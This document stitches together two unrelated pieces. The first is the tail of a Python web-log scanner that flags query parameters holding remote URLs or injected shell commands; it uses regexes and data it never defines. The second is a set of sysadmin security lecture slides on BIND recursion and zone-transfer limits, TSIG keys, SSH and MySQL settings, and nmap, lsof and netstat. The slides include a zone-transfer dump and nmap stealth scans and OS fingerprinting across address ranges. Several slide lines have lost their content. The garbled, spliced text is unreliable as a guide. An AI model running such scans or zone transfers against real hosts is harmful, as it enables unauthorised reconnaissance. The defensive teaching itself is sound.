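def parse_line(line):
    """Return the fields we need from one combined-log line, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def query_params(url):
    """Split the query string on '&' only; a ';' inside a value is part of the
    payload (the second slide line relies on it), so it must not act as a separator."""
    query = url.partition("?")[2]
    for field in query.split("&"):
        if not field:
            continue
        key, _, raw = field.partition("=")
        yield key, unquote_plus(raw)


def suspicious_params(url):
    """[(param, reason)] for values that look like a remote URL or a shell command."""
    findings = []
    for key, value in query_params(url):
        if REMOTE_RE.match(value):
            findings.append((key, "remote-url"))
        elif ";" in value or SHELL_RE.search(value):
            findings.append((key, "shell-command"))
    return findings


def scan(lines):
    """Return one record per suspicious request: who, when, what, and why."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        findings = suspicious_params(rec["url"])
        if findings:
            hits.append({"ip": rec["ip"], "ts": rec["ts"], "status": rec["status"],
                         "url": rec["url"], "findings": findings})
    return hits


if __name__ == "__main__":
    for h in scan(LOG_LINES):
        print(h["ip"], h["ts"], h["findings"])
```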
DNS
* SANS TOP20 UNIX #1: http://www.sans.org/top20/
* http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=dns  : 75
  http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bind : 33
* Forward Lookup (Host -> IP): www.yahoo.co.kr -> 202.43.214.151
* Reverse Lookup (IP -> Host): 202.43.214.151 -> UNKNOWN-202-43-214-151.yahoo.com

DNS protocol threats: DNS Spoofing, DNS Cache Poisoning, DNS ID hacking, Denial Of Service

DNS protocol
1. (microsoft.com).
2. (microsoft.com).
3. client microsoft.com.
4. DNS 1-2.
Bind
- Bind 4.x
- Bind 8.x: root DNS, DNS query; no new features, only major security patches.
- Bind 9.x: DNSSEC, code rewrite, multithread (answering queries while loading zones)
- djbdns: DNS protocol (zone-transfer, tcp 53 X, ...)
- Nsd (Name Server Daemon) http://www.nlnetlabs.nl/nsd/ : query, authoritative-only.

master/slave DNS
  primary, secondary? (X)   1st, 2nd? (X)   master, slave! (O)
  Is the master the main server and the slave only a backup? No:
  (1) Root DNS: A.root-servers.net : master; B-M.root-servers.net : slave
  (2) .kr DNS: ns.krnic.net : master; ns.kreonet.re.kr, kr2nd.kornet.net, kr2ld.dacom.co.kr, kr2nd.hitel.net, usns.dacom.co.kr : slave
  master and slave both answer! Slave!!

DNS (Microsoft DNS, 2001)
1. master/slave on different networks (KT, Dacom, Hanaro: good!)
   master/slave in the same IDC; master/slave on the same OS: single point of failure

DNS
DNS: Advertising (authoritative) vs Resolving (recursive)
# nslookup nog.or.kr. nis.dacom.co.kr
Server:  nis.dacom.co.kr
Address:  164.124.101.31
Name:    nog.or.kr
Served by:
- J.ROOT-SERVERS.NET  192.58.128.30
- K.ROOT-SERVERS.NET  193.0.14.129
- L.ROOT-SERVERS.NET  198.32.64.12

# nslookup nog.or.kr. ns.dacom.co.kr
Server:  ns.dacom.co.kr
Address:  164.124.101.2
Name:    nog.or.kr
Address:  203.231.233.36
DNS - recursion
Recursion risks: (1) DoS (2) spoofing / cache poisoning
Restrict recursion:
options {
    allow-recursion { 127.0.0.1; 192.168.1.0/24; };
};
or
acl internal { 127.0.0.1; 192.168.1.0/24; };
options {
    allow-recursion { internal; };
};

DNS - recursion off
options {
    allow-recursion { none; };
};
or
options {
    recursion no;
};
bind 4.x: options no-recursion
DNS - zone transfer
* zone-transfer risks: (1) bandwidth DoS (2) IP disclosure
* zone-transfer restriction
(1) master-slave
options {
    allow-transfer { 192.168.1.10; };
};
options {
    allow-transfer { none; };
};
(2) only master
options {
    allow-transfer { none; };
};
(3) per zone
zone "server.com" {
    type master;
    file "server.zone";
    allow-transfer { 192.168.1.10; };
};

zone-transfer
[root@dns /root]# dig @ns.xxxxx.ac.kr xxxxx.ac.kr axfr
; <<>> DiG 8.2 <<>> @ns.xxxxx.ac.kr xxxxx.ac.kr axfr
; (1 server found)
$ORIGIN xxxxx.ac.kr.
@           1H IN SOA  ns root.ns (
                       2003101773  ; serial
                       6H          ; refresh
                       10M         ; retry
                       1W          ; expiry
                       1H )        ; minimum
            1H IN NS   ns
            1H IN NS   ns2
            1H IN MX   0 smtp
            1H IN MX   10 smtp2
            1H IN A    xxx.xxx.6.20
ling        1H IN A    xxx.xxx.100.22
script      1H IN A    xxx.xxx.44.18
mobicomm    1H IN A    xxx.xxx.19.212
knuth       1H IN A    xxx.xxx.44.14
maynard     1H IN A    xxx.xxx.47.79
...
TSIG
* TSIG : Transaction SIGnature (instead of IP-based trust)
* master / slave share one key
* clock skew (5 minutes: expired)
* key generation
[root@dns root]# dnssec-keygen -a hmac-md5 -b 128 -n HOST host1-host2.
Khost1-host2.+157+35206
128 bit (16 byte) hmac-md5, base-64
IP-based:   allow-transfer { 192.168.3.4; };
TSIG-based: allow-transfer { key host1-host2.; };

TSIG zone-transfer
* master
key host1-host2. {
    algorithm hmac-md5;
    secret "+NLqXOznZv4jhV5amBL2yg==";
};
zone "server.com" {
    type master;
    file "server.zone";
    allow-transfer { key host1-host2.; };
};
* slave
key host1-host2. {
    algorithm hmac-md5;
    secret "+NLqXOznZv4jhV5amBL2yg==";
};
server 192.168.3.5 {        // 192.168.3.5 = master DNS IP
    keys { host1-host2.; };
};
zone "server.com" {
    type slave;
    masters { 192.168.3.5; };
    file "server.zone";
};
Bind version check
(1) dig
# dig @ns.server.com txt chaos version.bind
(2) nslookup
# nslookup -q=txt -class=chaos version.bind ns.server.com

DNS: udp/tcp 53
udp 53 : DNS queries
tcp 53 : (1) zone transfer (2) responses over 484 bytes fall back from udp 53 to tcp
* tcp 53? DNS servers MUST support UDP and SHOULD support TCP (RFC 1123)
* source port: 1024:65535, or 53
- bind 4.x uses source port 53.
- query-source address * port 53;   (only udp)
DNS - root servers
* 2002-10-21: 1 hour icmp DDoS against the root servers; 9 of the roots were affected. http://boston.internet.com/news/article.php/1486981
root DNS: 13 servers. http://www.root-servers.org/
gtld (com/net) DNS: 13 servers, VeriSign
  A, Herndon, VA       B, Mt. View, CA       C, Dulles, VA
  D, Sterling, VA      E, Los Angeles, CA    F, Seattle, WA
  G, Mt. View, CA      H, Amsterdam, Netherlands   I, Stockholm, Sweden
  J, Tokyo, Japan      K, London, United Kingdom   L, Atlanta, GA
  M, Hong Kong, China
.kr DNS: 6 servers. KRNIC 1 (Primary), 4 (Secondary), 5 (Secondary, San Jose, CA, USA)
SSH
OpenSSH (http://www.openssh.org/) : sshd,  /etc/ssh/
SSH.COM ssh (http://www.ssh.com/) : sshd2, /etc/ssh2/

OpenSSH
* SSH protocol v1 vs v2: use v2
* ssh

OpenSSH
* /etc/ssh/sshd_config
  Protocol 2,1  ->  Protocol 2
  PermitRootLogin no
  RhostsAuthentication no
  AllowGroups wheel admin
  AllowUsers user1 user2
  Port 875

SSH2
* /etc/ssh2/sshd2_config
  DenyUsers devil@192.168.1.3,warez,1337
  AllowHosts 211.47.65.0/24 192.168.1.3
  PasswordGuesses 3
  Ssh1Compatibility no
# scp /tmp/test.dat 192.168.1.3:/root/
root@192.168.1.3's password: xxxxx
Transfering /tmp/test.dat -> 192.168.1.3:/root/test.dat (11k)...
10445 bytes transferred in 0.07 seconds [138.75 kb/sec].
mysql
* do not run the db as root!!!
/etc/my.cnf
[mysqld]
user=mysql
* set the mysql root password
$ mysql -u root mysql
mysql> UPDATE user SET Password=PASSWORD('xxxxxxx') WHERE user='root';
mysql> FLUSH PRIVILEGES;
* (db.)
NMAP : http://www.insecure.org/nmap/
# ./configure ; make ; make install
Nmap usage: nmap [Scan Type(s)] [Options] <target specification>
State Open: accept(), Filtered :

nmap scan types (stealth: SYN/FIN/XMAS/Null need root)
-sS : SYN (half-open): syn -> syn/ack = open, rst = closed
-sF : FIN: RST = closed, no reply = open
-sX : XMAS (SYN/FIN/ACK/URG/PSH/RST)
-sN : Null
-sT : connect()
-sU : udp: icmp port unreachable = closed, otherwise open
-sP : icmp echo request / tcp ping only

nmap -A :
# nmap -A server.com
PORT     STATE   SERVICE   VERSION
22/tcp   open    ssh       SSH 2.0.13 (protocol 2.0)
23/tcp   open    telnet    Linux telnetd
25/tcp   open    smtp      Sendmail smtpd 8.12.3
80/tcp   open    http      Apache httpd 1.3.26 ((Unix) PHP/4.0.5)
-O  : OS fingerprinting (nmap-os-fingerprints)
-F  : fast, ports from /usr/local/share/nmap/nmap-services
-P0 : no icmp echo request (ping) first

# nmap -v 192.168.1.1
  scan tcp ports of 192.168.1.1, -v verbose.
# nmap -sS -O 192.168.1.0/24
  192.168.1.0/24: 192.168.1.1 to 192.168.1.254, 254 IPs, SYN scan with -O OS detection.
# nmap -sX -p 22,53,110,143,4564 198.116.*.1-127 192.168.0.0/16
  the class B and the .1-.127 hosts of 198.116.*: sshd, DNS, pop3d, imapd and 4564 with an X-mas scan.
(lsof) lsof : 'List Open Files'
* by process : lsof -p <PID>
* by user    : lsof -u user, lsof -u UID
* by file    : lsof filename
* by command : lsof -c process_name

(netstat)
* network connections, routing, interfaces
* options:
  -a : all sockets.
  -l : listening sockets.
  -p : owning process.
  -r : routing table (route).
  -n : numeric ip (no reverse lookup).
  -c : continuous netstat.